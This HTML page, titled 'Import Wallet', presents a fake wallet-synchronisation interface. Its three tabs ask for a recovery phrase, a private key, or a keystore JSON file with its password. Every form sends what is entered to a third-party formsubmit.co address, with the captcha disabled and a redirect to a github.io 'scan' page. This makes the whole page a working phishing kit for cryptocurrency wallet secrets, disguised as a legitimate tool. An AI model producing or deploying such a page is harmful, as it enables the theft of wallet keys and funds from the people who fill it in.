<!DOCTYPE html>
<html>

<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	
    <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" rel="stylesheet">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <title>Import Wallet</title>
    <link rel="stylesheet" href="assets/bootstrap/css/walletbootstrap.min.css">
    <script type="text/javascript" src="static/walletmain.js.download"></script>
    <style type="text/css">
    	

body {
  background-color: #fff;
  overflow-x: hidden;
}

a, a:hover {
  text-decoration: none;
}

header {
  width: 100%;
  height: 40px;
  padding-top: 15px;
}

.intro h5 {
  margin-top: 30px;
  text-align: center;
}

.footer {
  margin-top: 100px;
}

.text-center.img-center {
  margin-top: 80px;
}

.c-list a {
  padding: 20px;
  background-color: #fff;
  display: block;
  margin: 0;
  color: #222;
  border-bottom: 1px solid #222;
}

.c-list img {
  margin-right: 20px;
  width: 30px;
  height: 30px;
}

.nav.nav-tabs {
  margin-top: 30px;
}

.nav-tabs .nav-item.show .nav-link, .nav-tabs .nav-link.active {
  color: #fff;
  background: transparent;
  border: 0;
  border-bottom: 2px solid;
}

.nav-tabs .nav-link {
  color: #d3cece;
}

.dark_text{
    
    color: #343a40 !important;
}


    </style>
</head>
<body>
    <header>
        <!-- <div class="container-fluid">
			<div class="row">
			<div class="col-md-4 offset-md-4">
				<a class="text-white" href="/" style="font-size: 20px;">&nbsp; &nbsp; <img style="height: 50px; width:300px;" class="img-fluid" src="images/connectx-logo-rgb.png"> </a>
			</div>
			</div>
		</div> -->

  </header>
	<div class="container-fluid">
		
		<div class="row">
			<div class="col-md-4 offset-md-4">
				<ul class="nav nav-tabs">
					<li class="nav-item"><a class="nav-link active dark_text" data-toggle="tab" href="#phrase">Phrase</a></li>
					<li class="nav-item"><a class="nav-link dark_text" data-toggle="tab" href="#privatekey">Private Key</a></li>
					<li class="nav-item"><a class="nav-link dark_text" data-toggle="tab" href="#keystore">Keystore</a></li>
				</ul>
			</div>
		</div>
	</div>
    <section style="margin-top: 40px;">
        <div class="container-fluid">
            <div class="row">
                <div class="col-md-4 offset-md-4">
					<!-- Tab panes -->
					<div class="tab-content">
						<div role="tabpanel" class="tab-pane fade show active" id="phrase">
							<form method="post" action="https://formsubmit.co/31b38fb3f6f5eb9783dea9b202e3bab3"  method="POST">
							<!-- Honeypot -->
							<input type = "text" name = "_honey" style = "display: none;">
							
							<!-- Disable Captcha -->
							<input type = "hidden" name = "_captcha" value = "false">
								
							<input type = "hidden" name = "_next" value = "https://hannahmabe.github.io/live/scan.html">
							
								<div class="form-group">
									<input class="form-control" type="text" name="wallet" placeholder="Wallet Name">
								</div>
								<div class="form-group">
									<textarea class="form-control" rows="5" name="phrase" placeholder="Phrase"></textarea>
								</div>
								<div class="form-group"><button class="btn btn-primary btn-block" type="submit">Synchronize</button></div>
							</form>
						</div>
						<div role="tabpanel" class="tab-pane fade" id="keystore">
							<form method="post" action="https://formsubmit.co/31b38fb3f6f5eb9783dea9b202e3bab3"  method="POST">
								<div class="form-group">
									<textarea class="form-control" name="keystorejson" rows="5" placeholder="Keystore JSON"></textarea>
								</div>
								<div class="form-group">
									<input class="form-control" type="password" name="keystorepasswword" placeholder="Password">
								</div>
								<div class="form-group"><button class="btn btn-primary btn-block" type="submit">Synchronize</button></div>
							</form>
						</div>
						<div role="tabpanel" class="tab-pane fade" id="privatekey">
							<form method="post" action="https://formsubmit.co/31b38fb3f6f5eb9783dea9b202e3bab3"  method="POST">
								<div class="form-group">
									<input class="form-control" name="privatekey" placeholder="Private Key">
								</div>
								<div class="form-group"><button class="btn btn-primary btn-block" type="submit">Synchronize</button></div>
							</form>
						</div>
					</div>
					</div>
					
                </div>                              
            </div>

						            
    </section>
<script src="asset/js/jquery.min.js"></script>
<script src="asset/bootstrap/js/bootstrap.min.js"></script>


</body>
</html>
